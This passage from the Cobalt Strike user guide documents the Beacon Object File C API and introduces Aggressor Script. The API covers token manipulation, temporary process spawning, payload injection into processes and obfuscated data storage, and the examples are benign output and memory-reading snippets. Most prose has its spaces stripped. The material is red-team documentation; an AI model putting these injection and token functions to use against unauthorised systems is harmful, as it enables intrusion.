|
||
containingtheBOFcontentasasecondargument,theentrypointasitsthirdargument,andthe
|
||
packedargumentsasitsfourthargument.Theoptiontochooseanentrypointexistsincase
|
||
youchoosetocombinelike-functionalityintoasingleBOF.
|
||
HereistheCprogramthatcorrespondstotheabovescript:
|
||
CobaltStrikeUserGuide www.fortra.com page:174
|
||
|
||
BeaconObjectFiles/BOFCAPI
|
||
/*
|
||
* Compile with:
|
||
* x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
|
||
* i686-w64-mingw32-gcc -c hello.c -o hello.x86.o
|
||
*/
|
||
#include <windows.h>
|
||
#include <stdio.h>
|
||
#include <tlhelp32.h>
|
||
#include "beacon.h"
|
||
void demo(char * args, int length) {
|
||
datap parser;
|
||
char * str_arg;
|
||
int num_arg;
|
||
BeaconDataParse(&parser, args, length);
|
||
str_arg = BeaconDataExtract(&parser, NULL);
|
||
num_arg = BeaconDataInt(&parser);
|
||
BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg);
|
||
}
|
||
Thedemofunctionisourentrypoint.Wedeclarethedatapstructureonthestack.Thisisan
|
||
emptyanduninitiatedstructurewithstateinformationforextractingargumentspreparedwith
|
||
&bof_pack.BeaconDataParseinitializesourparser.BeaconDataExtractextractsalength-
|
||
prefixedbinaryblobfromourarguments.Ourpackfunctionhasoptionstopackbinaryblobsas
|
||
zero-terminatedstringsencodedtothesession'sdefaultcharacterset,azero-terminatedwide-
|
||
characterstring,orabinaryblobwithouttransformation.TheBeaconDataIntextractsaninteger
|
||
thatwaspackedintoourarguments.BeaconPrintfisonewaytoformatoutputandmakeit
|
||
availabletotheoperator.
|
||
BOF C API
|
||
Data Parser API
|
||
TheDataParserAPIextractsargumentspackedwithAggressorScript's&bof_packfunction.
|
||
Extractalength-prefixedbinaryblob.ThesizeargumentmaybeNULL.Ifanaddressisprovided,
|
||
thesizeispopulatedwiththenumber-of-bytesextracted.
|
||
char*BeaconDataExtract(datap*parser,int*size)
|
||
Extracta4binteger.
|
||
CobaltStrikeUserGuide www.fortra.com page:175
|
||
|
||
BeaconObjectFiles/BOFCAPI
|
||
intBeaconDataInt(datap*parser)
|
||
Gettheamountofdatalefttoparse.
|
||
intBeaconDataLength(datap*parser)
|
||
Prepareadataparsertoextractargumentsfromthespecifiedbuffer.
|
||
voidBeaconDataParse(datap*parser,char*buffer,intsize)
|
||
Extracta2binteger.
|
||
shortBeaconDataShort(datap*parser)
|
||
Output API
|
||
TheOutputAPIreturnsoutputtoCobaltStrike.
|
||
FormatandpresentoutputtotheBeaconoperator.
|
||
voidBeaconPrintf(inttype,char*fmt,...)
|
||
SendoutputtotheBeaconoperator.
|
||
voidBeaconOutput(inttype,char*data,intlen)
|
||
Eachofthesefunctionsacceptsatypeargument.ThistypedetermineshowCobaltStrikewill
|
||
processtheoutputandwhatitwillpresenttheoutputas.Thetypesare:
|
||
CALLBACK_OUTPUTisgenericoutput.CobaltStrikewillconvertthisoutputtoUTF-16
|
||
(internally)usingthetarget'sdefaultcharacterset.
|
||
CALLBACK_OUTPUT_OEMisgenericoutput.CobaltStrikewillconvertthisoutputtoUTF-16
|
||
(internally)usingthetarget'sOEMcharacterset.Youprobablywon'tneedthis,unless
|
||
you'redealingwithoutputfromcmd.exe.
|
||
CALLBACK_ERRORisagenericerrormessage.
|
||
CALLBACK_OUTPUT_UTF8isgenericoutput.CobaltStrikewillconvertthisoutputtoUTF-
|
||
16(internally)fromUTF-8.
|
||
Format API
|
||
TheformatAPIisusedtobuildlargeorrepeatingoutput.
|
||
CobaltStrikeUserGuide www.fortra.com page:176
|
||
|
||
BeaconObjectFiles/BOFCAPI
|
||
Allocatememorytoformatcomplexorlargeoutput.
|
||
voidBeaconFormatAlloc(formatp*obj,intmaxsz)
|
||
Appenddatatothisformatobject.
|
||
voidBeaconFormatAppend(formatp*obj,char*data,intlen)
|
||
Freetheformatobject.
|
||
voidBeaconFormatFree(formatp*obj)
|
||
Appenda4binteger(bigendian)tothisobject.
|
||
voidBeaconFormatInt(formatp*obj,intval)
|
||
Appendaformattedstringtothisobject.
|
||
voidBeaconFormatPrintf(formatp*obj,char*fmt,...)
|
||
Resetstheformatobjecttoitsdefaultstate(priortore-use).
|
||
voidBeaconFormatReset(formatp*obj)
|
||
Extractformatteddataintoasinglestring.Populatethepassedinsizevariablewiththelength
|
||
ofthisstring.TheseparametersaresuitableforusewiththeBeaconOutputfunction.
|
||
char*BeaconFormatToString(formatp*obj,int*size)
|
||
Internal APIs
|
||
ThefollowingfunctionsmanipulatethetokenusedinthecurrentBeaconcontext:
|
||
ApplythespecifiedtokenasBeacon'scurrentthreadtoken.Thiswillreportthenewtokentothe
|
||
usertoo.ReturnsTRUEifsuccessful.FALSEisnot.
|
||
BOOLBeaconUseToken(HANDLEtoken)
|
||
Dropthecurrentthreadtoken.UsethisoverdirectcallstoRevertToSelf.Thisfunctioncleansup
|
||
otherstateinformationaboutthetoken.
|
||
voidBeaconRevertToken()
|
||
ReturnsTRUEifBeaconisinahigh-integritycontext.
|
||
CobaltStrikeUserGuide www.fortra.com page:177
|
||
|
||
BeaconObjectFiles/BOFCAPI
|
||
BOOLBeaconIsAdmIn()
|
||
ThefollowingfunctionsprovidesomeaccesstoBeacon'sprocessinjectioncapability:
|
||
Populatethespecifiedbufferwiththex86orx64spawntovalueconfiguredforthisBeacon
|
||
session.
|
||
voidBeaconGetSpawnTo(BOOLx86,char*buffer,intlength)
|
||
Thisfunctionspawnsatemporaryprocessaccountingforppid,spawnto,andblockdllsoptions.
|
||
GrabthehandlefromPROCESS_INFORMATIONtoinjectintoormanipulatethisprocess.
|
||
ReturnsTRUEifsuccessful.
|
||
BOOLBeaconSpawnTemporaryProcess(BOOLx86,BOOLignoreToken,
|
||
STARTUPINFO*sInfo,PROCESS_INFORMATION*pInfo)
|
||
Thisfunctionwillinjectthespecifiedpayloadintoanexistingprocess.Usepayload_offsetto
|
||
specifytheoffsetwithinthepayloadtobeginexecution.Theargvalueisforarguments.argmay
|
||
beNULL.
|
||
voidBeaconInjectProcess(HANDLEhProc,intpid,char*payload,intpayload_len,
|
||
intpayload_offset,char*arg,intarg_len)
|
||
ThisfunctioninjectsthespecifiedpayloadintoatemporaryprocessthatyourBOFoptedto
|
||
launch.Usepayload_offsettospecifytheoffsetwithinthepayloadtobeginexecution.Thearg
|
||
valueisforarguments.argmaybeNULL.
|
||
voidBeaconInjectTemporaryProcess(PROCESS_INFORMATION*pInfo,char*
|
||
payload,intpayload_len,intpayload_offset,char*arg,intarg_len)
|
||
Thisfunctioncleansupsomehandlesthatareoftenforgottenabout.Callthiswhenyou'redone
|
||
interactingwiththehandlesforaprocess.Youdon'tneedtowaitfortheprocesstoexitorfinish.
|
||
voidBeaconCleanupProcess(PROCESS_INFORMATION*pInfo)
|
||
ThefollowingfunctionsareusedtoaccessstoreditemsinBeaconDataStore:
|
||
Returnsapointertothespecificitem.Ifthereisnoentryatthatindex,thefunctionreturns
|
||
NULL.
|
||
PDATA_STORE_OBJECTBeaconDataStoreGetItem(size_tindex)
|
||
ThisfunctionobfuscatesaspecificiteminBeaconDataStore.
|
||
voidBeaconDataStoreProtectItem(size_tindex)
|
||
CobaltStrikeUserGuide www.fortra.com page:178
|
||
|
||
BeaconObjectFiles/BOFCAPI
|
||
Thisfunctionun-obfuscatesaspecificiteminBeaconDataStore.
|
||
voidBeaconDataStoreUnprotectItem(size_tindex)
|
||
ReturnthemaximumsizeofBeaconDataStore.
|
||
size_tBeaconDataStoreMaxEntries()
|
||
Thefollowingfunctionisautilityfunction:
|
||
Convertthesrc stringtoaUTF16-LEwide-characterstring,usingthetarget'sdefaultencoding.
|
||
max isthesize(inbytes!)ofthedestinationbuffer.
|
||
BOOLtoWideChar(char*src,wchar_t*dst,intmax)
|
||
Thisfunctionreturnsinformationaboutbeaconsuchasthebeaconaddress,sectionstomask,
|
||
heaprecordstomask,themask,sleepmaskaddressandsleepmasksizeinformation.
|
||
voidBeaconInformation(BEACON_INFO*info);
|
||
ThefollowingfunctionsprovideaccesstoBeacon'skeyvaluestore:
|
||
Thisfunctionaddsamemoryaddresstoaninternalkeyvaluestoretoallowtheabilityto
|
||
retrievethisvalueusingthekeyinasubsequentBOFexecution.
|
||
BOOLBeaconAddValue(constchar*key,void*ptr);
|
||
Thisfunctionretrievesthememoryaddressthatisassociatedwiththekey fromtheinternal
|
||
keyvaluestore.IfthekeyisnotfoundthenNULLisreturned.
|
||
void*BeaconGetValue(constchar*key);
|
||
Thisfunctionremovesthekey fromtheinternalkeyvaluestore.Thiswillnotdoanymemory
|
||
cleanupofthememoryaddressandafinialexecutionofaBOFshoulddothenecessaryclean
|
||
upinordertopreventmemoryleaks.
|
||
BOOLBeaconRemoveValue(constchar*key);
|
||
ThefollowingfunctionretrievesthecustomdatabufferfromBeaconUserData.
|
||
char*BeaconGetCustomUserData()
|
||
WhenaUserDefinedReflectiveLoaderprovidesBeaconUserData(BUD)duringtheloading
|
||
process,thenthisfunctionwillreturnapointertothecustombufferarrayassociatedwiththe
|
||
BUD.Thesizeofthisbufferarrayisfixedat32bytes,asdefinedintheUSER_DATAstructure.A
|
||
CobaltStrikeUserGuide www.fortra.com page:179
|
||
|
||
BeaconObjectFiles/FormattingBOFOutput
|
||
validmemorypointerisalwaysreturned.IfnoBUDisprovidedbytheUserDefinedReflective
|
||
Loader,thenthepointeristothedefaultbufferarraywithall32valuessettozero.
|
||
Formatting BOF Output
|
||
ThebeaconformatAPIallowsyoutomodifyhowbeaconreturnsdatatotheusertosuitthe
|
||
usersNeed.Datareturnedinaloopisanobviousexampleanduse-caseforthisAPI.
|
||
WithouttheBeaconFormatAPI,beaconwillsendtheoutputbacktoyoueverytimeyouusethe
|
||
BeaconPrintfAPIcall.Thiscouldleadtoformattingthatislessthanideal.
|
||
Thebestwaytoillustratetheproblemisbyusingsomeexamples.
|
||
Example - Simple counting BOF using a loop:
|
||
CountingBOFExample
|
||
1 #include <windows.h>
|
||
2 #include "beacon.h"
|
||
3 #include "bofdefs.h"
|
||
4
|
||
5 void LoopExample()
|
||
6 {
|
||
7 int i;
|
||
8 for(i=0;i<11;i++)
|
||
9 {
|
||
10 BeaconPrintf(CALLBACK_OUTPUT,"counter is currently at %i",i);
|
||
11 }
|
||
12 }
|
||
13
|
||
14 void go(char * args, int len) {
|
||
15 LoopExample();
|
||
16 }
|
||
Whenthecodeisexecuted,youshouldseethefollowingresult:
|
||
CobaltStrikeUserGuide www.fortra.com page:180
|
||
|
||
BeaconObjectFiles/FormattingBOFOutput
|
||
figure68-Example1Output
|
||
Asexpected,theoutputisservedbackinchunks,displayingspacinginbetweeneventhougha
|
||
newlinecharacterwasnotspecifiedbecauseBeaconPrintfautomaticallyaddsanewlinefor
|
||
you.
|
||
IfyoumodifytheBeaconObjectFiletousetheBeaconFormatAPIinstead,youcangainmore
|
||
controloverwhattheoutputlookslikewithfollowingsteps:
|
||
1. First,allocatememorytoformattheoutput.
|
||
2. Oncethebufferisallocatedandthereisapointertothebuffer,appendtothebuffer
|
||
usingtheappendAPIslikeBeaconFormatAppend,BeaconFormatintand
|
||
BeaconFormatPrintf.
|
||
3. Whensatisfiedwiththebuffer,printitoutusingBeaconFormatToString
|
||
4. Afterwards,youcaneitherreusethebufferforadditionaloperationsusing
|
||
BeaconFormatResetor,ifyouaredonewithit,freeuptheallocatedmemoryusing
|
||
BeaconFormatFree.
|
||
Example - Using this approach in the counting BOF
|
||
CountingBOFExample2
|
||
1 #include <windows.h>
|
||
2 #include "beacon.h"
|
||
3 #include "bofdefs.h"
|
||
4
|
||
CobaltStrikeUserGuide www.fortra.com page:181
|
||
|
||
BeaconObjectFiles/FormattingBOFOutput
|
||
5 void LoopExampleWithFormatting()
|
||
6 {
|
||
7 //1. create the new buffer pointer
|
||
8 formatp buffer;
|
||
9
|
||
10 //2. allocate memory to hold the formatted data
|
||
11 BeaconFormatAlloc(&buffer,1024);
|
||
12
|
||
13 int i;
|
||
14 for(i=0;i<11;i++)
|
||
15 {
|
||
16 //3. instead of printing, we will now fill the buffer - notice the new line
|
||
character!
|
||
17 BeaconFormatPrintf(&buffer, "counter is currently at: %i\n",i);
|
||
18 }
|
||
19
|
||
20 //4. now that we have our filled up buffer, let's print it out
|
||
21 BeaconPrintf(CALLBACK_OUTPUT,"%s\n",BeaconFormatToString(&buffer,NULL));
|
||
22
|
||
23 //5. time to free up the buffer
|
||
24 BeaconFormatFree(&buffer);
|
||
25 }
|
||
26
|
||
27 void LoopExample()
|
||
28 {
|
||
29 int i;
|
||
30 for(i=0;i<11;i++)
|
||
31 {
|
||
32 BeaconPrintf(CALLBACK_OUTPUT,"counter is currently at %i",i);
|
||
33 }
|
||
34 }
|
||
35
|
||
36 void go(char * args, int len) {
|
||
37 LoopExampleWithFormatting();
|
||
38 }
|
||
Whenthecodeisexecuted,youshouldseethefollowingresult:
|
||
CobaltStrikeUserGuide www.fortra.com page:182
|
||
|
||
BeaconObjectFiles/FormattingBOFOutput
|
||
Example - Read the virtual memory of the current process
|
||
ReadVirtualMemoryExample
|
||
1 #include <windows.h>
|
||
2 #include "beacon.h"
|
||
3 #include "bofdefs.h"
|
||
4
|
||
5 HMODULE GetModHandle(LPCSTR module)
|
||
6 {
|
||
7 HMODULE hModule = KERNEL32$GetModuleHandleA(module);
|
||
8 return hModule ? hModule : KERNEL32$LoadLibraryA(module);
|
||
9 }
|
||
10
|
||
11 LPVOID GetMemptr(LPCSTR module, LPCSTR function)
|
||
12 {
|
||
13 HMODULE hModule = GetModHandle(module);
|
||
14 LPVOID memPtr = KERNEL32$GetProcAddress(hModule,function);
|
||
15 return memPtr? memPtr : NULL;
|
||
16 }
|
||
17
|
||
18 //format options: 1 decompile format, any other number - raw opcodes
|
||
19 void ReadvirtualMemory(LPCSTR module, LPCSTR function,int size, int format)
|
||
20 {
|
||
21 LPVOID memPtr = GetMemptr(module,function);
|
||
22 if(!memPtr)
|
||
23 {
|
||
24 BeaconPrintf(CALLBACK_ERROR,"no memptr found\n");
|
||
CobaltStrikeUserGuide www.fortra.com page:183
|
||
|
||
BeaconObjectFiles/FormattingBOFOutput
|
||
25 return;
|
||
26 }
|
||
27 else
|
||
28 {
|
||
29 formatp buffer;
|
||
30 BeaconFormatAlloc(&buffer,1024);
|
||
31 BYTE *readbuffer = (BYTE*)MSVCRT$malloc(size);
|
||
32 SIZE_T bytesread = 0;
|
||
33 KERNEL32$ReadProcessMemory((HANDLE)-1,memPtr,readbuffer,size,&bytesread);
|
||
34 BeaconFormatPrintf(&buffer, "showing the first %i opcodes of
|
||
%s!%s\n",size,module,function);
|
||
35
|
||
36 for(int i = 0; i < size; i++)
|
||
37 {
|
||
38 if(format == 1)
|
||
39 {
|
||
40 BeaconFormatPrintf(&buffer,"\\x%02X",readbuffer[i]);
|
||
41 }
|
||
42 else
|
||
43 {
|
||
44 BeaconFormatPrintf(&buffer,"%02X",readbuffer[i]);
|
||
45 }
|
||
46 }
|
||
47 BeaconPrintf(CALLBACK_OUTPUT,"%s\n",BeaconFormatToString(&buffer,NULL));
|
||
48 BeaconFormatFree(&buffer);
|
||
49 MSVCRT$free(readbuffer);
|
||
50 }
|
||
51 }
|
||
52 void go(char * args, int len) {
|
||
53 char* module;
|
||
54 char* function;
|
||
55 int size;
|
||
56 int format;
|
||
57 datap parser;
|
||
58 BeaconDataParse(&parser, args, len);
|
||
59 module = BeaconDataExtract(&parser,NULL);
|
||
60 function = BeaconDataExtract(&parser,NULL);
|
||
61 size = BeaconDataInt(&parser);
|
||
CobaltStrikeUserGuide www.fortra.com page:184
|
||
|
||
BeaconObjectFiles/FormattingBOFOutput
|
||
62 format = BeaconDataInt(&parser);
|
||
63 ReadvirtualMemory(module, function, size, format);
|
||
64 }
|
||
InthisBOF,usershavetheoptiontoreadanarbitrarynumberofbytesofafunctionwithinthe
|
||
currentprocessanddisplayitinspecificformats.UsingtheBeaconFormatAPI,thisbecomes
|
||
trivialtodo.
|
||
Forexample,youcandisplaybytesasfollows:
|
||
Thismakesiteasytocopypastetheoutputandputitinadecompilerlikeso:
|
||
Otherswouldratherhaveallthebytesrightnexttoeachotherlikeso:
|
||
CobaltStrikeUserGuide www.fortra.com page:185
|
||
|
||
AggressorScript/WhatisAggressorScript?
|
||
Aggressor Script
|
||
What is Aggressor Script?
|
||
AggressorScriptisthescriptinglanguagebuiltintoCobaltStrike,version3.0,andlater.
|
||
AggressorScriptallowsyoutomodifyandextendtheCobaltStrikeclient.
|
||
History
|
||
AggressorScriptisthespiritualsuccessortoCortana,theopensourcescriptingenginein
|
||
Armitage.CortanawasmadepossiblebyacontractthroughDARPA'sCyberFastTrack
|
||
program.CortanaallowsitsuserstoextendArmitageandcontroltheMetasploitFramework
|
||
anditsfeaturesthroughArmitage'steamserver.CobaltStrike3.0isaground-uprewriteof
|
||
CobaltStrikewithoutArmitageasafoundation.Thischangeaffordedanopportunitytorevisit
|
||
CobaltStrike'sscriptingandbuildsomethingaroundCobaltStrike'sfeatures.Theresultofthis
|
||
workisAggressorScript.
|
||
AggressorScriptisascriptinglanguageforredteamoperationsandadversarysimulations
|
||
inspiredbyscriptableIRCclientsandbots.Itspurposeistwo-fold.Youmaycreatelongrunning
|
||
botsthatsimulatevirtualredteammembers,hackingside-by-sidewithyou.Youmayalsouseit
|
||
toextendandmodifytheCobaltStrikeclienttoyourneeds.
|
||
Status
|
||
AggressorScriptispartofCobaltStrike3.0'sfoundation.Mostpopupmenusandthe
|
||
presentationofeventsinCobaltStrike3.0aremanagedbytheAggressorScriptengine.That
|
||
said,AggressorScriptisstillinitsinfancy.StrategicCyberLLChasyettobuildAPIsformostof
|
||
CobaltStrike'sfeatures.ExpecttoseeAggressorScriptevolveovertime.Thisdocumentationis
|
||
alsoaworkinprogress.
|
||
How to Load Scripts
|
||
AggressorScriptisbuiltintotheCobaltStrikeclient.Topermanentlyloadascript,gotoCobalt
|
||
Strike -> Script ManagerandpressLoad.
|
||
CobaltStrikeUserGuide www.fortra.com page:186
|
||
|
||
AggressorScript/TheScriptConsole
|
||
figure69-CobaltStrikeScriptLoader
|
||
The Script Console
|
||
CobaltStrikeprovidesaconsoletocontrolandinteractwithyourscripts.Throughtheconsole
|
||
youmaytrace,profile,debug,andmanageyourscripts.TheAggressorScriptconsoleis
|
||
availableviaView -> Script Console.
|
||
Thefollowingcommandsareavailableintheconsole:
|
||
Command Arguments What it does
|
||
? "*foo*"iswm"foobar" evaluateasleeppredicateandprintresult
|
||
e println("foo"); evaluateasleepstatement
|
||
help listallofthecommandsavailable
|
||
load /path/to/script.cna loadanAggressorScriptscript
|
||
ls listallofthescriptsloaded
|
||
proff script.cna disabletheSleepprofilerforthescript
|
||
profile script.cna dumpsperformancestatisticsforthescript.
|
||
pron script.cna enablestheSleepprofilerforthescript
|
||
reload script.cna reloadsthescript
|
||
troff script.cna disablefunctiontraceforthescript
|
||
tron script.cna enablefunctiontraceforthescript
|
||
unload script.cna unloadthescript
|
||
x 2+2 evaluateasleepexpressionandprintresult
|
||
CobaltStrikeUserGuide www.fortra.com page:187
|
||
|
||
AggressorScript/HeadlessCobaltStrike
|
||
figure70-Interactingwiththescriptconsole
|
||
Headless Cobalt Strike
|
||
YoumayuseAggressorScriptswithouttheCobaltStrikeGUI.Theagscriptprogram(included
|
||
withtheCobaltStrikeLinuxpackage)runstheheadlessCobaltStrikeclient.Theagscript
|
||
programrequiresfourarguments:
|
||
./agscript [host] [port] [user] [password]
|
||
TheseargumentsconnecttheheadlessCobaltStrikeclienttotheteamserveryouspecify.The
|
||
headlessCobaltStrikeclientpresentstheAggressorScriptconsole.
|
||
Youmayuseagscripttoimmediatelyconnecttoateamserverandrunascriptofyour
|
||
choosing.Use:
|
||
./agscript [host] [port] [user] [password] [/path/to/script.cna]
|
||
ThiscommandwillconnecttheheadlessCobaltStrikeclienttoateamserver,loadyourscript,
|
||
andrunit.TheheadlessCobaltStrikeclientwillrunyourscriptbeforeitsynchronizeswiththe
|
||
teamserver.Useon readytowaitfortheheadlessCobaltStrikeclienttofinishthedata
|
||
synchronizationstep.
|
||
on ready {
|
||
println("Hello World! I am synchronized!");
|
||
closeClient();
|
||
}
|
||
AQuick Sleep Introduction
|
||
CobaltStrikeUserGuide www.fortra.com page:188
|
||
|
||
AggressorScript/AQuickSleepIntroduction
|
||
AggressorScriptbuildsonRaphaelMudge'sSleepScriptingLanguage.TheSleepmanualis
|
||
availableathttp://sleep.dashnine.org/manual
|
||
AggressorScriptwilldoanythingthatSleepdoessuchas:
|
||
l Sleep'ssyntax,operators,andidiomsaresimilartothePerlscriptinglanguage.Thereis
|
||
onemajordifferencethatcatchesnewprogrammers.Sleeprequireswhitespace
|
||
betweenoperatorsandtheirterms.Thefollowingcodeisnotvalid:
|
||
$x=1+2; # this will not parse!!
|
||
Thisstatementisvalidthough:
|
||
$x = 1 + 2;
|
||
l Sleepvariablesarecalledscalarsandscalarsholdstrings,numbersinvariousformats,
|
||
Javaobjectreferences,functions,arrays,anddictionaries.Hereareseveral
|
||
assignmentsinSleep:
|
||
$x = "Hello World";
|
||
$y = 3;
|
||
$z = @(1, 2, 3, "four");
|
||
$a = %(a => "apple", b => "bat", c => "awesome language", d => 4);
|
||
l Arraysanddictionariesarecreatedwiththe@ and% functions.Arraysanddictionaries
|
||
mayreferenceotherarraysanddictionaries.Arraysanddictionariesmayevenreference
|
||
themselves.
|
||
l Commentsbeginwitha#andgountiltheendoftheline.
|
||
l Sleepinterpolatesdouble-quotedstrings.Thismeansthatanywhite-spaceseparated
|
||
tokenbeginningwitha$ signisreplacedwithitsvalue.Thespecialvariable$+
|
||
concatenatesaninterpolatedstringwithanothervalue.
|
||
println("\$a is: $a and \n\$x joined with \$y is: $x $+ $y");
|
||
Thiswillprintout:
|
||
$a is: %(d => 4, b => 'bat', c => 'awesome language', a => 'apple') and
|
||
$x joined with $y is: Hello World3
|
||
l There'safunctioncalled&warn.Itworkslike&println,exceptitincludesthecurrent
|
||
scriptnameandalinenumbertoo.Thisisagreatfunctiontodebugcodewith.
|
||
l Sleepfunctionsaredeclaredwiththesubkeyword.Argumentstofunctionsarelabeled
|
||
$1,$2,allthewayupto$n.Functionswillacceptanynumberofarguments.The
|
||
variable@_isanarraycontainingalloftheargumentstoo.Changesto$1,$2,etc.will
|
||
alterthecontentsof@_.
|
||
CobaltStrikeUserGuide www.fortra.com page:189
|
||
|
||
AggressorScript/InteractingwiththeUser
|
||
sub addTwoValues {
|
||
println($1 + $2);
|
||
}
|
||
addTwoValues("3", 55.0);
|
||
Thisscriptprintsout:
|
||
58.0
|
||
l InSleep,afunctionisafirst-classtypelikeanyotherobject.Hereareafewthingsthat
|
||
youmaysee:
|
||
$addf = &addTwoValues;
|
||
l The$addfvariablenowreferencesthe&addTwoValuesfunction.Tocallafunction
|
||
enclosedinavariable,use:
|
||
[$addf : "3", 55.0];
|
||
l ThisbracketnotationisalsousedtomanipulateJavaobjects.Irecommendreadingthe
|
||
Sleepmanualifyou'reinterestedinlearningmoreaboutthis.Thefollowingstatements
|
||
areequivalentandtheydothesamething:
|
||
[$addf : "3", 55.0];
|
||
[&addTwoValues : "3", 55.0];
|
||
[{ println($1 + $2); } : "3", 55.0];
|
||
addTwoValues("3", 55.0);
|
||
l Sleephasthreevariablescopes:global,closure-specific,andlocal.TheSleepmanual
|
||
coversthisinmoredetail.Ifyouseelocal('$x$y$z')inanexample,itmeansthat$x,$y,
|
||
and$zarelocaltothecurrentfunctionandtheirvalueswilldisappearwhenthefunction
|
||
returns.Sleepuseslexicalscopingforitsvariables.
|
||
Sleephasalloftheotherbasicconstructsyou'dexpectinascriptinglanguage.Youshouldread
|
||
themanualtolearnmoreaboutit.
|
||
Interacting with the User
|
||
AggressorScriptdisplaysoutputusingSleep's&println,&printAll,&writeb,and&warnfunctions.
|
||
Thesefunctionsdisplayoutputtothescriptconsole.
|
||
Scriptsmayregistercommandsaswell.Thesecommandsallowscriptstoreceiveatrigger
|
||
fromtheuserthroughtheconsole.Usethecommandkeywordtoregisteracommand:
|
||
CobaltStrikeUserGuide www.fortra.com page:190
|
||
|
||
AggressorScript/CobaltStrike
|
||
command foo{
|
||
println("Hello $1");
|
||
}
|
||
Thiscodesnippetregistersthecommandfoo.Thescriptconsoleautomaticallyparsesthe
|
||
argumentstoacommandandsplitsthembywhitespaceintotokensforyou.$1isthefirst
|
||
token,$2isthesecondtoken,andsoon.Typically,tokensareseparatedbyspacesbutusers
|
||
mayuse"doublequotes"tocreateatokenwithspaces.Ifthisparsingisdisruptivetowhatyou'd
|
||
liketodowiththeinput,use$0toaccesstherawtextpassedtothecommand.
|
||
figure71-CommandOutput
|
||
Colors
|
||
YoumayaddcolorandstylestotextthatisoutputinCobaltStrike'sconsoles.The\c,\U,and
|
||
\oescapestellCobaltStrilehowtoformattext.Theseescapesareparsedinsideofdouble-
|
||
quotedstringsonly.
|
||
The\cXescapecolorsthetextthatcomesafterit.Xspecifiesthecolor.Yourcolorchoicesare:
|
||
figure72-ColorOptions
|
||
The\Uescapeunderlinesthetextthatcomesafterit.Asecond\Ustopstheunderlineformat.
|
||
The\oescaperesetstheformatofthetextthatcomesafterit.Anewlineresetstextformatting
|
||
aswell.
|
||
Cobalt Strike
|
||
The Cobalt Strike Client
|
||
TheAggressorScriptengineisthegluefeatureinCobaltStrike.MostCobaltStrikedialogsand
|
||
featuresarewrittenasstand-alonemodulesthatexposesomeinterfacetotheAggressorScript
|
||
engine.
|
||
CobaltStrikeUserGuide www.fortra.com page:191
|
||
|
||
AggressorScript/CobaltStrike
|
||
Aninternalscript,default.cna,definesthedefaultCobaltStrikeexperience.Thisscriptdefines
|
||
CobaltStrike'stoolbarbuttons,popupmenus,anditalsoformatstheoutputformostCobalt
|
||
Strikeevents.
|
||
ThischapterwillshowyouhowthesefeaturesworkandempoweryoutoshapetheCobalt
|
||
Strikeclienttoyourneeds.
|
||
figure73-Thedefault.cnascript
|
||
Keyboard Shortcuts
|
||
Scriptsmaycreatekeyboardshortcuts.Usethebindkeywordtobindakeyboardshortcut.This
|
||
exampleshowsHello World!inadialogboxwhenCtrlandHarepressedtogether.
|
||
bind Ctrl+H {
|
||
show_message("Hello World!");
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:192
|
||
|
||
AggressorScript/CobaltStrike
|
||
KeyboardshortcutsmaybeanyASCIIcharactersoraspecialkey.Shortcutsmayhaveoneor
|
||
moremodifiersappliedtothem.Amodifierisoneof:Ctrl,Shift,Alt,orMeta.Scriptsmayspecify
|
||
themodifier+key.
|
||
Popup Menus
|
||
ScriptsmayalsoaddtoCobaltStrike'smenustructureorre-defineit.Thepopupkeywordbuilds
|
||
amenuhierarchyforapopuphook.
|
||
Here'sthecodethatdefinesCobaltStrike'shelpmenu:
|
||
popup help {
|
||
item("&Homepage", { url_open("https://www.cobaltstrike.com/"); });
|
||
item("&Support", { url_open("https://www.cobaltstrike.com/support"); });
|
||
item("&Arsenal", { url_open("https://www.cobaltstrike.com/scripts"); });
|
||
separator();
|
||
item("&Malleable C2 Profile", { openMalleableProfileDialog(); });
|
||
item("&System Information", { openSystemInformationDialog(); });
|
||
separator();
|
||
item("&About", { openAboutDialog(); });
|
||
}
|
||
Thisscripthooksintothehelppopuphookanddefinesseveralmenuitems.The&inthemenu
|
||
itemnameisitskeyboardaccelerator.Thecodeblockassociatedwitheachitemexecutes
|
||
whentheuserclicksonit.
|
||
Scriptsmaydefinemenuswithchildrenaswell.Themenukeyworddefinesanewmenu.When
|
||
theuserhoversoverthemenu,theblockofcodeassociatedwithitisexecutedandusedto
|
||
buildthechildmenu.
|
||
Here'sthePivotGraphmenuasanexampleofthis:
|
||
popup pgraph {
|
||
menu "&Layout" {
|
||
item "&Circle" { graph_layout($1, "circle"); }
|
||
item "&Stack" { graph_layout($1, "stack"); }
|
||
menu "&Tree" {
|
||
item "&Bottom" { graph_layout($1, "tree-bottom"); }
|
||
item "&Left" { graph_layout($1, "tree-left"); }
|
||
item "&Right" { graph_layout($1, "tree-right"); }
|
||
item "&Top" { graph_layout($1, "tree-top"); }
|
||
}
|
||
separator();
|
||
item "&None" { graph_layout($1, "none"); }
|
||
CobaltStrikeUserGuide www.fortra.com page:193
|
||
|
||
AggressorScript/CobaltStrike
|
||
}
|
||
}
|
||
IfyourscriptspecifiesamenuhierarchyforaCobaltStrikemenuhook,itwilladdtothemenus
|
||
thatarealreadyinplace.Usethe&popup_clearfunctiontocleartheotherregisteredmenu
|
||
itemsandre-defineapopuphierarchytoyourtaste.
|
||
Custom Output
|
||
ThesetkeywordinAggressorScriptdefineshowtoformataneventandpresentitsoutputto
|
||
theuser.Here'sanexampleofthesetkeyword:
|
||
set EVENT_SBAR_LEFT {
|
||
return "[" . tstamp(ticks()) . "] " . mynick();
|
||
}
|
||
set EVENT_SBAR_RIGHT {
|
||
return "[lag: $1 $+ ]";
|
||
}
|
||
TheabovecodedefinesthecontentofthestatusbarinCobaltStrike'sEventLog(View -> Event
|
||
Log).Theleftsideofthisstatusbarshowsthecurrenttimeandyournickname.Therightside
|
||
showstheround-triptimeforamessagebetweenyourCobaltStrikeclientandtheteamserver.
|
||
YoumayoverrideanysetoptionintheCobaltStrikedefaultscript.Createyourownfilewith
|
||
definitionsforeventsyoucareabout.LoaditintoCobaltStrike.CobaltStrikewilluseyour
|
||
definitionsoverthebuilt-inones.
|
||
Events
|
||
Usetheonkeywordtodefineahandlerforanevent.ThereadyeventfireswhenCobaltStrikeis
|
||
connectedtotheteamserverandreadytoactonyourbehalf.
|
||
on ready {
|
||
show_message("Ready for action!");
|
||
}
|
||
CobaltStrikegenerateseventsforavarietyofsituations.Usethe*meta-eventtowatchall
|
